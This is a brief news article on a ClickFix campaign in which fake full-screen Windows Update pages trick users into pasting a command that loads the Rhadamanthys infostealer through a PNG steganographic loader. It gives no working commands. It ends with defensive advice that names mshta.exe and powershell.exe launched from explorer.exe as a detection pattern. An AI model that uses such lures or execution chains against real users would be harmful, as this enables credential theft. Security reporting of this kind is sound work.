Himasha Dissanayake, JadeTimes Staff

H. Dissanayake is a Jadetimes news reporter covering Technology

Source: Schechter, Shaffer & Harris, L.L.P

A new wave of ClickFix cyberattacks is exploiting fake Windows Update screens to deceive users into installing credential-stealing malware, security researchers at Huntress report. ClickFix is a rising social-engineering tactic that convinces victims to copy and run malicious commands, often disguised as “fixes” or system checks. According to Microsoft, ClickFix has now become the most common method attackers use to gain initial device access.

Security analysts Ben Folland and Anna Pham found that recent attacks no longer rely on robot-check prompts. Instead, they use a highly convincing, full-screen Windows Update page, tricking users into believing they must install a “critical update.” Victims are instructed to press Win+R and paste a malicious command, triggering a complex multi-stage infection chain.

Source: Source: BleepingComputer

Fake Windows security update screen

The malware is delivered through a steganographic loader, hiding malicious code within the pixel data of PNG images. The payload is reconstructed via color channels in memory, allowing it to bypass signature-based detection. The campaign primarily distributes Rhadamanthys infostealer, known for stealing login credentials. Huntress linked over 76 incidents between September 29 and October 30, 2025, affecting organizations in the US, EMEA, and APJ regions.

Although the Rhadamanthys infrastructure has been targeted by recent law enforcement efforts, active lure domains remain online, with source code suggesting Russian involvement.

Cybersecurity experts recommend organizations block the Windows Run box, train employees on ClickFix techniques, and monitor endpoints for suspicious execution chains, especially those involving mshta.exe or powershell.exe launched from explorer.exe.